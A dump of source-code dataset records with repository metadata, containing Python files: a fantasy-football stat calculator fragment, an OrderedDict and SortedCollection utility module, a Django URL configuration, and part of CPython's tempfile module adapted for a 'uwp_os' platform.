def __eq__(self, o: object) -> bool:
if isinstance(o, TwoPointConversionCalculator):
return o.value_calculator == self.value_calculator and super().__eq__(o)
return False
def __hash__(self):
return hash((self.value_calculator, super().__hash__()))
class TwoPointConversionsThrownCalculator(TwoPointConversionCalculator):
def __init__(self):
super().__init__(TwoPointConversionsThrownValueCalculator())
class TwoPointConversionsCaughtCalculator(TwoPointConversionCalculator):
def __init__(self):
super().__init__(TwoPointConversionsCaughtValueCalculator())
class TwoPointConversionsRushedCalculator(TwoPointConversionCalculator):
def __init__(self):
super().__init__(TwoPointConversionsRushedValueCalculator())
class FumbleRecoveryTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(FumbleRecoveryTouchdownsValueCalculator())
| true
| true
|
f707c9bae6d69a9013fae62fea2c4855ede04e46
| 13,339
|
py
|
Python
|
utils/orderedcollections.py
|
orionzhou/biolib
|
940fb66f1b2608d34a2d00ebdf41dc84c6381f42
|
[
"BSD-2-Clause"
] | 3
|
2019-02-22T20:35:23.000Z
|
2021-11-25T10:01:50.000Z
|
utils/orderedcollections.py
|
orionzhou/biolib
|
940fb66f1b2608d34a2d00ebdf41dc84c6381f42
|
[
"BSD-2-Clause"
] | null | null | null |
utils/orderedcollections.py
|
orionzhou/biolib
|
940fb66f1b2608d34a2d00ebdf41dc84c6381f42
|
[
"BSD-2-Clause"
] | 1
|
2021-02-19T03:10:14.000Z
|
2021-02-19T03:10:14.000Z
|
# Copyright (c) 2009 Raymond Hettinger
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
from urllib.parse import urlparse
from collections import Callable, defaultdict
try:
from UserDict import UserDict
from UserDict import DictMixin
except ImportError:
from collections import UserDict
from collections import MutableMapping as DictMixin
class OrderedDict(dict, DictMixin):
def __init__(self, *args, **kwds):
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__end
except AttributeError:
self.clear()
self.update(*args, **kwds)
def clear(self):
self.__end = end = []
end += [None, end, end] # sentinel node for doubly linked list
self.__map = {} # key --> [key, prev, next]
dict.clear(self)
def __setitem__(self, key, value):
if key not in self:
end = self.__end
curr = end[1]
curr[2] = end[1] = self.__map[key] = [key, curr, end]
dict.__setitem__(self, key, value)
def __delitem__(self, key):
dict.__delitem__(self, key)
key, prev, next = self.__map.pop(key)
prev[2] = next
next[1] = prev
def __iter__(self):
end = self.__end
curr = end[2]
while curr is not end:
yield curr[0]
curr = curr[2]
def __reversed__(self):
end = self.__end
curr = end[1]
while curr is not end:
yield curr[0]
curr = curr[1]
def popitem(self, last=True):
if not self:
raise KeyError('dictionary is empty')
if last:
key = reversed(self).next()
else:
key = iter(self).next()
value = self.pop(key)
return key, value
def __reduce__(self):
items = [[k, self[k]] for k in self]
tmp = self.__map, self.__end
del self.__map, self.__end
inst_dict = vars(self).copy()
self.__map, self.__end = tmp
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def keys(self):
return list(self)
setdefault = DictMixin.setdefault
update = DictMixin.update
pop = DictMixin.pop
values = DictMixin.values
items = DictMixin.items
#iterkeys = DictMixin.iterkeys
#itervalues = DictMixin.itervalues
#iteritems = DictMixin.iteritems
def __repr__(self):
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
def copy(self):
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
if isinstance(other, OrderedDict):
if len(self) != len(other):
return False
for p, q in zip(self.items(), other.items()):
if p != q:
return False
return True
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
"""
<http://stackoverflow.com/questions/6190331/can-i-do-an-ordered-default-dict-in-python>
"""
class DefaultOrderedDict(OrderedDict):
def __init__(self, default_factory=None, *a, **kw):
if (default_factory is not None and
not isinstance(default_factory, Callable)):
raise TypeError('first argument must be callable')
OrderedDict.__init__(self, *a, **kw)
self.default_factory = default_factory
def __getitem__(self, key):
try:
return OrderedDict.__getitem__(self, key)
except KeyError:
return self.__missing__(key)
def __missing__(self, key):
if self.default_factory is None:
raise KeyError(key)
self[key] = value = self.default_factory()
return value
def __reduce__(self):
if self.default_factory is None:
args = tuple()
else:
args = self.default_factory,
return type(self), args, None, None, self.items()
def copy(self):
return self.__copy__()
def __copy__(self):
return type(self)(self.default_factory, self)
def __deepcopy__(self, memo):
import copy
return type(self)(self.default_factory,
copy.deepcopy(self.items()))
def __repr__(self):
return 'OrderedDefaultDict(%s, %s)' % (self.default_factory,
OrderedDict.__repr__(self))
def parse_qs(qs, keep_blank_values=0, strict_parsing=0, keep_attr_order=True):
"""
Kind of like urlparse.parse_qs, except returns an ordered dict.
Also avoids replicating that function's bad habit of overriding the
built-in 'dict' type.
Taken from below with modification:
<https://bitbucket.org/btubbs/thumpy/raw/8cdece404f15/thumpy.py>
"""
od = DefaultOrderedDict(list) if keep_attr_order else defaultdict(list)
for name, value in urlparse.parse_qsl(qs, keep_blank_values, strict_parsing):
od[name].append(value)
return od
"""
Recipe from <http://code.activestate.com/recipes/577197-sortedcollection/>.
"""
from bisect import bisect_left, bisect_right
class SortedCollection(object):
'''Sequence sorted by a key function.
SortedCollection() is much easier to work with than using bisect() directly.
It supports key functions like those use in sorted(), min(), and max().
The result of the key function call is saved so that keys can be searched
efficiently.
Instead of returning an insertion-point which can be hard to interpret, the
five find-methods return a specific item in the sequence. They can scan for
exact matches, the last item less-than-or-equal to a key, or the first item
greater-than-or-equal to a key.
Once found, an item's ordinal position can be located with the index() method.
New items can be added with the insert() and insert_right() methods.
Old items can be deleted with the remove() method.
The usual sequence methods are provided to support indexing, slicing,
length lookup, clearing, copying, forward and reverse iteration, contains
checking, item counts, item removal, and a nice looking repr.
Finding and indexing are O(log n) operations while iteration and insertion
are O(n). The initial sort is O(n log n).
The key function is stored in the 'key' attibute for easy introspection or
so that you can assign a new key function (triggering an automatic re-sort).
In short, the class was designed to handle all of the common use cases for
bisect but with a simpler API and support for key functions.
>>> from pprint import pprint
>>> from operator import itemgetter
>>> s = SortedCollection(key=itemgetter(2))
>>> for record in [
... ('roger', 'young', 30),
... ('angela', 'jones', 28),
... ('bill', 'smith', 22),
... ('david', 'thomas', 32)]:
... s.insert(record)
>>> pprint(list(s)) # show records sorted by age
[('bill', 'smith', 22),
('angela', 'jones', 28),
('roger', 'young', 30),
('david', 'thomas', 32)]
>>> s.find_le(29) # find oldest person aged 29 or younger
('angela', 'jones', 28)
>>> s.find_lt(28) # find oldest person under 28
('bill', 'smith', 22)
>>> s.find_gt(28) # find youngest person over 28
('roger', 'young', 30)
>>> r = s.find_ge(32) # find youngest person aged 32 or older
>>> s.index(r) # get the index of their record
3
>>> s[3] # fetch the record at that index
('david', 'thomas', 32)
>>> s.key = itemgetter(0) # now sort by first name
>>> pprint(list(s))
[('angela', 'jones', 28),
('bill', 'smith', 22),
('david', 'thomas', 32),
('roger', 'young', 30)]
'''
def __init__(self, iterable=(), key=None):
self._given_key = key
key = (lambda x: x) if key is None else key
decorated = sorted((key(item), item) for item in iterable)
self._keys = [k for k, item in decorated]
self._items = [item for k, item in decorated]
self._key = key
def _getkey(self):
return self._key
def _setkey(self, key):
if key is not self._key:
self.__init__(self._items, key=key)
def _delkey(self):
self._setkey(None)
key = property(_getkey, _setkey, _delkey, 'key function')
def clear(self):
self.__init__([], self._key)
def copy(self):
return self.__class__(self, self._key)
def __len__(self):
return len(self._items)
def __getitem__(self, i):
return self._items[i]
def __iter__(self):
return iter(self._items)
def __reversed__(self):
return reversed(self._items)
def __repr__(self):
return '%s(%r, key=%s)' % (
self.__class__.__name__,
self._items,
getattr(self._given_key, '__name__', repr(self._given_key))
)
def __reduce__(self):
return self.__class__, (self._items, self._given_key)
def __contains__(self, item):
k = self._key(item)
i = bisect_left(self._keys, k)
j = bisect_right(self._keys, k)
return item in self._items[i:j]
def index(self, item):
'Find the position of an item. Raise ValueError if not found.'
k = self._key(item)
i = bisect_left(self._keys, k)
j = bisect_right(self._keys, k)
return self._items[i:j].index(item) + i
def count(self, item):
'Return number of occurrences of item'
k = self._key(item)
i = bisect_left(self._keys, k)
j = bisect_right(self._keys, k)
return self._items[i:j].count(item)
def insert(self, item):
'Insert a new item. If equal keys are found, add to the left'
k = self._key(item)
i = bisect_left(self._keys, k)
self._keys.insert(i, k)
self._items.insert(i, item)
def insert_right(self, item):
'Insert a new item. If equal keys are found, add to the right'
k = self._key(item)
i = bisect_right(self._keys, k)
self._keys.insert(i, k)
self._items.insert(i, item)
def remove(self, item):
'Remove first occurence of item. Raise ValueError if not found'
i = self.index(item)
del self._keys[i]
del self._items[i]
def find(self, item):
'Return first item with a key == item. Raise ValueError if not found.'
k = self._key(item)
i = bisect_left(self._keys, k)
if i != len(self) and self._keys[i] == k:
return self._items[i]
raise ValueError('No item found with key equal to: %r' % (k,))
def find_le(self, item):
'Return last item with a key <= item. Raise ValueError if not found.'
k = self._key(item)
i = bisect_right(self._keys, k)
if i:
return self._items[i - 1]
raise ValueError('No item found with key at or below: %r' % (k,))
def find_lt(self, item):
'Return last item with a key < item. Raise ValueError if not found.'
k = self._key(item)
i = bisect_left(self._keys, k)
if i:
return self._items[i - 1]
raise ValueError('No item found with key below: %r' % (k,))
def find_ge(self, item):
'Return first item with a key >= equal to item. Raise ValueError if not found'
k = self._key(item)
i = bisect_left(self._keys, k)
if i != len(self):
return self._items[i]
raise ValueError('No item found with key at or above: %r' % (k,))
def find_gt(self, item):
'Return first item with a key > item. Raise ValueError if not found'
k = self._key(item)
i = bisect_right(self._keys, k)
if i != len(self):
return self._items[i]
raise ValueError('No item found with key above: %r' % (k,))
| 33.3475
| 87
| 0.605518
|
from urllib.parse import urlparse
from collections import Callable, defaultdict
try:
from UserDict import UserDict
from UserDict import DictMixin
except ImportError:
from collections import UserDict
from collections import MutableMapping as DictMixin
class OrderedDict(dict, DictMixin):
def __init__(self, *args, **kwds):
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__end
except AttributeError:
self.clear()
self.update(*args, **kwds)
def clear(self):
self.__end = end = []
end += [None, end, end] self.__map = {} dict.clear(self)
def __setitem__(self, key, value):
if key not in self:
end = self.__end
curr = end[1]
curr[2] = end[1] = self.__map[key] = [key, curr, end]
dict.__setitem__(self, key, value)
def __delitem__(self, key):
dict.__delitem__(self, key)
key, prev, next = self.__map.pop(key)
prev[2] = next
next[1] = prev
def __iter__(self):
end = self.__end
curr = end[2]
while curr is not end:
yield curr[0]
curr = curr[2]
def __reversed__(self):
end = self.__end
curr = end[1]
while curr is not end:
yield curr[0]
curr = curr[1]
def popitem(self, last=True):
if not self:
raise KeyError('dictionary is empty')
if last:
key = reversed(self).next()
else:
key = iter(self).next()
value = self.pop(key)
return key, value
def __reduce__(self):
items = [[k, self[k]] for k in self]
tmp = self.__map, self.__end
del self.__map, self.__end
inst_dict = vars(self).copy()
self.__map, self.__end = tmp
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def keys(self):
return list(self)
setdefault = DictMixin.setdefault
update = DictMixin.update
pop = DictMixin.pop
values = DictMixin.values
items = DictMixin.items
def __repr__(self):
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
def copy(self):
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
if isinstance(other, OrderedDict):
if len(self) != len(other):
return False
for p, q in zip(self.items(), other.items()):
if p != q:
return False
return True
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
class DefaultOrderedDict(OrderedDict):
def __init__(self, default_factory=None, *a, **kw):
if (default_factory is not None and
not isinstance(default_factory, Callable)):
raise TypeError('first argument must be callable')
OrderedDict.__init__(self, *a, **kw)
self.default_factory = default_factory
def __getitem__(self, key):
try:
return OrderedDict.__getitem__(self, key)
except KeyError:
return self.__missing__(key)
def __missing__(self, key):
if self.default_factory is None:
raise KeyError(key)
self[key] = value = self.default_factory()
return value
def __reduce__(self):
if self.default_factory is None:
args = tuple()
else:
args = self.default_factory,
return type(self), args, None, None, self.items()
def copy(self):
return self.__copy__()
def __copy__(self):
return type(self)(self.default_factory, self)
def __deepcopy__(self, memo):
import copy
return type(self)(self.default_factory,
copy.deepcopy(self.items()))
def __repr__(self):
return 'OrderedDefaultDict(%s, %s)' % (self.default_factory,
OrderedDict.__repr__(self))
def parse_qs(qs, keep_blank_values=0, strict_parsing=0, keep_attr_order=True):
od = DefaultOrderedDict(list) if keep_attr_order else defaultdict(list)
for name, value in urlparse.parse_qsl(qs, keep_blank_values, strict_parsing):
od[name].append(value)
return od
from bisect import bisect_left, bisect_right
class SortedCollection(object):
def __init__(self, iterable=(), key=None):
self._given_key = key
key = (lambda x: x) if key is None else key
decorated = sorted((key(item), item) for item in iterable)
self._keys = [k for k, item in decorated]
self._items = [item for k, item in decorated]
self._key = key
def _getkey(self):
return self._key
def _setkey(self, key):
if key is not self._key:
self.__init__(self._items, key=key)
def _delkey(self):
self._setkey(None)
key = property(_getkey, _setkey, _delkey, 'key function')
def clear(self):
self.__init__([], self._key)
def copy(self):
return self.__class__(self, self._key)
def __len__(self):
return len(self._items)
def __getitem__(self, i):
return self._items[i]
def __iter__(self):
return iter(self._items)
def __reversed__(self):
return reversed(self._items)
def __repr__(self):
return '%s(%r, key=%s)' % (
self.__class__.__name__,
self._items,
getattr(self._given_key, '__name__', repr(self._given_key))
)
def __reduce__(self):
return self.__class__, (self._items, self._given_key)
def __contains__(self, item):
k = self._key(item)
i = bisect_left(self._keys, k)
j = bisect_right(self._keys, k)
return item in self._items[i:j]
def index(self, item):
k = self._key(item)
i = bisect_left(self._keys, k)
j = bisect_right(self._keys, k)
return self._items[i:j].index(item) + i
def count(self, item):
k = self._key(item)
i = bisect_left(self._keys, k)
j = bisect_right(self._keys, k)
return self._items[i:j].count(item)
def insert(self, item):
k = self._key(item)
i = bisect_left(self._keys, k)
self._keys.insert(i, k)
self._items.insert(i, item)
def insert_right(self, item):
k = self._key(item)
i = bisect_right(self._keys, k)
self._keys.insert(i, k)
self._items.insert(i, item)
def remove(self, item):
i = self.index(item)
del self._keys[i]
del self._items[i]
def find(self, item):
k = self._key(item)
i = bisect_left(self._keys, k)
if i != len(self) and self._keys[i] == k:
return self._items[i]
raise ValueError('No item found with key equal to: %r' % (k,))
def find_le(self, item):
k = self._key(item)
i = bisect_right(self._keys, k)
if i:
return self._items[i - 1]
raise ValueError('No item found with key at or below: %r' % (k,))
def find_lt(self, item):
k = self._key(item)
i = bisect_left(self._keys, k)
if i:
return self._items[i - 1]
raise ValueError('No item found with key below: %r' % (k,))
def find_ge(self, item):
k = self._key(item)
i = bisect_left(self._keys, k)
if i != len(self):
return self._items[i]
raise ValueError('No item found with key at or above: %r' % (k,))
def find_gt(self, item):
k = self._key(item)
i = bisect_right(self._keys, k)
if i != len(self):
return self._items[i]
raise ValueError('No item found with key above: %r' % (k,))
| true
| true
|
f707ca2e53757b03d3bb7f1b28158ce7a33af228
| 1,519
|
py
|
Python
|
manager_app/urls.py
|
syz247179876/e_mall
|
f94e39e091e098242342f532ae371b8ff127542f
|
[
"Apache-2.0"
] | 7
|
2021-04-10T13:20:56.000Z
|
2022-03-29T15:00:29.000Z
|
manager_app/urls.py
|
syz247179876/E_mall
|
f94e39e091e098242342f532ae371b8ff127542f
|
[
"Apache-2.0"
] | 9
|
2021-05-11T03:53:31.000Z
|
2022-03-12T00:58:03.000Z
|
manager_app/urls.py
|
syz247179876/E_mall
|
f94e39e091e098242342f532ae371b8ff127542f
|
[
"Apache-2.0"
] | 2
|
2020-11-24T08:59:22.000Z
|
2020-11-24T14:10:59.000Z
|
# -*- coding: utf-8 -*-
# @Time : 2021/2/10 下午12:59
# @Author : 司云中
# @File : urls.py
# @Software: Pycharm
from django.conf import settings
from django.urls import path, include
from manager_app.apis.auth_api import ManagerLoginApiView, ManagerRegisterApiView
from manager_app.apis.manage_carousel_api import ManageCarouselApiView
from manager_app.apis.manage_commodity_api import ManagerCommodityCategoryApiView, ManageCommodityGroupApiView
from manager_app.apis.manage_permission_api import ManagePermissionApiView
from manager_app.apis.manage_role_api import ManageRoleApiView
from manager_app.apis.manage_seller_api import ManagerSellerPermApiView, ManagerSellerRoleApiView
app_name = "manager_app"
auth_patterns = [
path('login/', ManagerLoginApiView.as_view()),
path('register/', ManagerRegisterApiView.as_view()),
]
urlpatterns = {
path(f'{settings.URL_PREFIX}/auth/', include(auth_patterns)),
path(f'{settings.URL_PREFIX}/role/', ManageRoleApiView.as_view()),
path(f'{settings.URL_PREFIX}/permission/', ManagePermissionApiView.as_view()),
path(f'{settings.URL_PREFIX}/commodity-category/', ManagerCommodityCategoryApiView.as_view()),
path(f'{settings.URL_PREFIX}/commodity-group/', ManageCommodityGroupApiView.as_view()),
path(f'{settings.URL_PREFIX}/role/seller/', ManagerSellerRoleApiView.as_view()),
path(f'{settings.URL_PREFIX}/permission/seller/', ManagerSellerPermApiView.as_view()),
path(f'{settings.URL_PREFIX}/carousel/', ManageCarouselApiView.as_view())
}
| 46.030303
| 110
| 0.789993
|
from django.conf import settings
from django.urls import path, include
from manager_app.apis.auth_api import ManagerLoginApiView, ManagerRegisterApiView
from manager_app.apis.manage_carousel_api import ManageCarouselApiView
from manager_app.apis.manage_commodity_api import ManagerCommodityCategoryApiView, ManageCommodityGroupApiView
from manager_app.apis.manage_permission_api import ManagePermissionApiView
from manager_app.apis.manage_role_api import ManageRoleApiView
from manager_app.apis.manage_seller_api import ManagerSellerPermApiView, ManagerSellerRoleApiView
app_name = "manager_app"
auth_patterns = [
path('login/', ManagerLoginApiView.as_view()),
path('register/', ManagerRegisterApiView.as_view()),
]
urlpatterns = {
path(f'{settings.URL_PREFIX}/auth/', include(auth_patterns)),
path(f'{settings.URL_PREFIX}/role/', ManageRoleApiView.as_view()),
path(f'{settings.URL_PREFIX}/permission/', ManagePermissionApiView.as_view()),
path(f'{settings.URL_PREFIX}/commodity-category/', ManagerCommodityCategoryApiView.as_view()),
path(f'{settings.URL_PREFIX}/commodity-group/', ManageCommodityGroupApiView.as_view()),
path(f'{settings.URL_PREFIX}/role/seller/', ManagerSellerRoleApiView.as_view()),
path(f'{settings.URL_PREFIX}/permission/seller/', ManagerSellerPermApiView.as_view()),
path(f'{settings.URL_PREFIX}/carousel/', ManageCarouselApiView.as_view())
}
| true
| true
|
f707caeebe22a441a1841182e56fb3dd303cb612
| 26,230
|
py
|
Python
|
cpython/Lib/tempfile.py
|
ms-iot/python
|
a8f8fba1214289572713520f83409762a4446fea
|
[
"BSD-3-Clause"
] | 70
|
2015-06-20T17:59:24.000Z
|
2021-05-03T02:01:49.000Z
|
cpython/Lib/tempfile.py
|
ms-iot/python
|
a8f8fba1214289572713520f83409762a4446fea
|
[
"BSD-3-Clause"
] | 16
|
2015-06-11T14:57:43.000Z
|
2016-12-03T00:22:13.000Z
|
cpython/Lib/tempfile.py
|
ms-iot/python
|
a8f8fba1214289572713520f83409762a4446fea
|
[
"BSD-3-Clause"
] | 36
|
2015-05-15T20:30:44.000Z
|
2020-11-14T19:31:40.000Z
|
"""Temporary files.
This module provides generic, low- and high-level interfaces for
creating temporary files and directories. All of the interfaces
provided by this module can be used without fear of race conditions
except for 'mktemp'. 'mktemp' is subject to race conditions and
should not be used; it is provided for backward compatibility only.
The default path names are returned as str. If you supply bytes as
input, all return values will be in bytes. Ex:
>>> tempfile.mkstemp()
(4, '/tmp/tmptpu9nin8')
>>> tempfile.mkdtemp(suffix=b'')
b'/tmp/tmppbi8f0hy'
This module also provides some data items to the user:
TMP_MAX - maximum number of names that will be tried before
giving up.
tempdir - If this is set to a string before the first use of
any routine from this module, it will be considered as
another candidate location to store temporary files.
"""
__all__ = [
"NamedTemporaryFile", "TemporaryFile", # high level safe interfaces
"SpooledTemporaryFile", "TemporaryDirectory",
"mkstemp", "mkdtemp", # low level safe interfaces
"mktemp", # deprecated unsafe interface
"TMP_MAX", "gettempprefix", # constants
"tempdir", "gettempdir",
"gettempprefixb", "gettempdirb",
]
# Imports.
import functools as _functools
import warnings as _warnings
import io as _io
import os as _os
import shutil as _shutil
import errno as _errno
from random import Random as _Random
import weakref as _weakref
try:
import _thread
except ImportError:
import _dummy_thread as _thread
_allocate_lock = _thread.allocate_lock
_text_openflags = _os.O_RDWR | _os.O_CREAT | _os.O_EXCL
if hasattr(_os, 'O_NOFOLLOW'):
_text_openflags |= _os.O_NOFOLLOW
_bin_openflags = _text_openflags
if hasattr(_os, 'O_BINARY'):
_bin_openflags |= _os.O_BINARY
if hasattr(_os, 'TMP_MAX'):
TMP_MAX = _os.TMP_MAX
else:
TMP_MAX = 10000
# This variable _was_ unused for legacy reasons, see issue 10354.
# But as of 3.5 we actually use it at runtime so changing it would
# have a possibly desirable side effect... But we do not want to support
# that as an API. It is undocumented on purpose. Do not depend on this.
template = "tmp"
# Internal routines.
_once_lock = _allocate_lock()
if hasattr(_os, "lstat"):
_stat = _os.lstat
elif hasattr(_os, "stat"):
_stat = _os.stat
else:
# Fallback. All we need is something that raises OSError if the
# file doesn't exist.
def _stat(fn):
fd = _os.open(fn, _os.O_RDONLY)
_os.close(fd)
def _exists(fn):
try:
_stat(fn)
except OSError:
return False
else:
return True
def _infer_return_type(*args):
"""Look at the type of all args and divine their implied return type."""
return_type = None
for arg in args:
if arg is None:
continue
if isinstance(arg, bytes):
if return_type is str:
raise TypeError("Can't mix bytes and non-bytes in "
"path components.")
return_type = bytes
else:
if return_type is bytes:
raise TypeError("Can't mix bytes and non-bytes in "
"path components.")
return_type = str
if return_type is None:
return str # tempfile APIs return a str by default.
return return_type
def _sanitize_params(prefix, suffix, dir):
"""Common parameter processing for most APIs in this module."""
output_type = _infer_return_type(prefix, suffix, dir)
if suffix is None:
suffix = output_type()
if prefix is None:
if output_type is str:
prefix = template
else:
prefix = _os.fsencode(template)
if dir is None:
if output_type is str:
dir = gettempdir()
else:
dir = gettempdirb()
return prefix, suffix, dir, output_type
class _RandomNameSequence:
"""An instance of _RandomNameSequence generates an endless
sequence of unpredictable strings which can safely be incorporated
into file names. Each string is six characters long. Multiple
threads can safely use the same instance at the same time.
_RandomNameSequence is an iterator."""
characters = "abcdefghijklmnopqrstuvwxyz0123456789_"
@property
def rng(self):
cur_pid = _os.getpid()
if cur_pid != getattr(self, '_rng_pid', None):
self._rng = _Random()
self._rng_pid = cur_pid
return self._rng
def __iter__(self):
return self
def __next__(self):
c = self.characters
choose = self.rng.choice
letters = [choose(c) for dummy in range(8)]
return ''.join(letters)
def _candidate_tempdir_list():
"""Generate a list of candidate temporary directories which
_get_default_tempdir will try."""
dirlist = []
# First, try the environment.
for envname in 'TMPDIR', 'TEMP', 'TMP':
dirname = _os.getenv(envname)
if dirname: dirlist.append(dirname)
# Failing that, try OS-specific locations.
if _os.name == 'nt':
dirlist.extend([ r'c:\temp', r'c:\tmp', r'\temp', r'\tmp' ])
elif _os.name != 'uwp_os':
dirlist.extend([ '/tmp', '/var/tmp', '/usr/tmp' ])
# As a last resort, the current directory.
try:
dirlist.append(_os.getcwd())
except (AttributeError, OSError):
dirlist.append(_os.curdir)
return dirlist
def _get_default_tempdir():
"""Calculate the default directory to use for temporary files.
This routine should be called exactly once.
We determine whether or not a candidate temp dir is usable by
trying to create and write to a file in that directory. If this
is successful, the test file is deleted. To prevent denial of
service, the name of the test file must be randomized."""
namer = _RandomNameSequence()
dirlist = _candidate_tempdir_list()
for dir in dirlist:
if dir != _os.curdir:
dir = _os.path.abspath(dir)
# Try only a few names per directory.
for seq in range(100):
name = next(namer)
filename = _os.path.join(dir, name)
try:
fd = _os.open(filename, _bin_openflags, 0o600)
try:
try:
with _io.open(fd, 'wb', closefd=False) as fp:
fp.write(b'blat')
finally:
_os.close(fd)
finally:
_os.unlink(filename)
return dir
except FileExistsError:
pass
except PermissionError:
# This exception is thrown when a directory with the chosen name
# already exists on windows.
if ((_os.name == 'nt' or _os.name == 'uwp_os') and _os.path.isdir(dir) and
_os.access(dir, _os.W_OK)):
continue
break # no point trying more names in this directory
except OSError:
break # no point trying more names in this directory
raise FileNotFoundError(_errno.ENOENT,
"No usable temporary directory found in %s" %
dirlist)
_name_sequence = None
def _get_candidate_names():
"""Common setup sequence for all user-callable interfaces."""
global _name_sequence
if _name_sequence is None:
_once_lock.acquire()
try:
if _name_sequence is None:
_name_sequence = _RandomNameSequence()
finally:
_once_lock.release()
return _name_sequence
def _mkstemp_inner(dir, pre, suf, flags, output_type):
"""Code common to mkstemp, TemporaryFile, and NamedTemporaryFile."""
names = _get_candidate_names()
if output_type is bytes:
names = map(_os.fsencode, names)
for seq in range(TMP_MAX):
name = next(names)
file = _os.path.join(dir, pre + name + suf)
try:
fd = _os.open(file, flags, 0o600)
except FileExistsError:
continue # try again
except PermissionError:
# This exception is thrown when a directory with the chosen name
# already exists on windows.
if ((_os.name == 'nt' or _os.name == 'uwp_os') and _os.path.isdir(dir) and
_os.access(dir, _os.W_OK)):
continue
else:
raise
return (fd, _os.path.abspath(file))
raise FileExistsError(_errno.EEXIST,
"No usable temporary file name found")
# User visible interfaces.
def gettempprefix():
"""The default prefix for temporary directories."""
return template
def gettempprefixb():
"""The default prefix for temporary directories as bytes."""
return _os.fsencode(gettempprefix())
tempdir = None
def gettempdir():
"""Accessor for tempfile.tempdir."""
global tempdir
if tempdir is None:
_once_lock.acquire()
try:
if tempdir is None:
tempdir = _get_default_tempdir()
finally:
_once_lock.release()
return tempdir
def gettempdirb():
"""A bytes version of tempfile.gettempdir()."""
return _os.fsencode(gettempdir())
def mkstemp(suffix=None, prefix=None, dir=None, text=False):
"""User-callable function to create and return a unique temporary
file. The return value is a pair (fd, name) where fd is the
file descriptor returned by os.open, and name is the filename.
If 'suffix' is specified, the file name will end with that suffix,
otherwise there will be no suffix.
If 'prefix' is specified, the file name will begin with that prefix,
otherwise a default prefix is used.
If 'dir' is specified, the file will be created in that directory,
otherwise a default directory is used.
If 'text' is specified and true, the file is opened in text
mode. Else (the default) the file is opened in binary mode. On
some operating systems, this makes no difference.
suffix, prefix and dir must all contain the same type if specified.
If they are bytes, the returned name will be bytes; str otherwise.
A value of None will cause an appropriate default to be used.
The file is readable and writable only by the creating user ID.
If the operating system uses permission bits to indicate whether a
file is executable, the file is executable by no one. The file
descriptor is not inherited by children of this process.
Caller is responsible for deleting the file when done with it.
"""
prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)
if text:
flags = _text_openflags
else:
flags = _bin_openflags
return _mkstemp_inner(dir, prefix, suffix, flags, output_type)
def mkdtemp(suffix=None, prefix=None, dir=None):
"""User-callable function to create and return a unique temporary
directory. The return value is the pathname of the directory.
Arguments are as for mkstemp, except that the 'text' argument is
not accepted.
The directory is readable, writable, and searchable only by the
creating user.
Caller is responsible for deleting the directory when done with it.
"""
prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)
names = _get_candidate_names()
if output_type is bytes:
names = map(_os.fsencode, names)
for seq in range(TMP_MAX):
name = next(names)
file = _os.path.join(dir, prefix + name + suffix)
try:
_os.mkdir(file, 0o700)
except FileExistsError:
continue # try again
except PermissionError:
# This exception is thrown when a directory with the chosen name
# already exists on windows.
if ((_os.name == 'nt' or _os.name == 'uwp_os') and _os.path.isdir(dir) and
_os.access(dir, _os.W_OK)):
continue
else:
raise
return file
raise FileExistsError(_errno.EEXIST,
"No usable temporary directory name found")
def mktemp(suffix="", prefix=template, dir=None):
"""User-callable function to return a unique temporary file name. The
file is not created.
Arguments are as for mkstemp, except that the 'text' argument is
not accepted.
THIS FUNCTION IS UNSAFE AND SHOULD NOT BE USED. The file name may
refer to a file that did not exist at some point, but by the time
you get around to creating it, someone else may have beaten you to
the punch.
"""
## from warnings import warn as _warn
## _warn("mktemp is a potential security risk to your program",
## RuntimeWarning, stacklevel=2)
if dir is None:
dir = gettempdir()
names = _get_candidate_names()
for seq in range(TMP_MAX):
name = next(names)
file = _os.path.join(dir, prefix + name + suffix)
if not _exists(file):
return file
raise FileExistsError(_errno.EEXIST,
"No usable temporary filename found")
class _TemporaryFileCloser:
"""A separate object allowing proper closing of a temporary file's
underlying file object, without adding a __del__ method to the
temporary file."""
file = None # Set here since __del__ checks it
close_called = False
def __init__(self, file, name, delete=True):
self.file = file
self.name = name
self.delete = delete
# NT provides delete-on-close as a primitive, so we don't need
# the wrapper to do anything special. We still use it so that
# file.name is useful (i.e. not "(fdopen)") with NamedTemporaryFile.
if _os.name != 'nt' and _os.name != 'uwp_os':
# Cache the unlinker so we don't get spurious errors at
# shutdown when the module-level "os" is None'd out. Note
# that this must be referenced as self.unlink, because the
# name TemporaryFileWrapper may also get None'd out before
# __del__ is called.
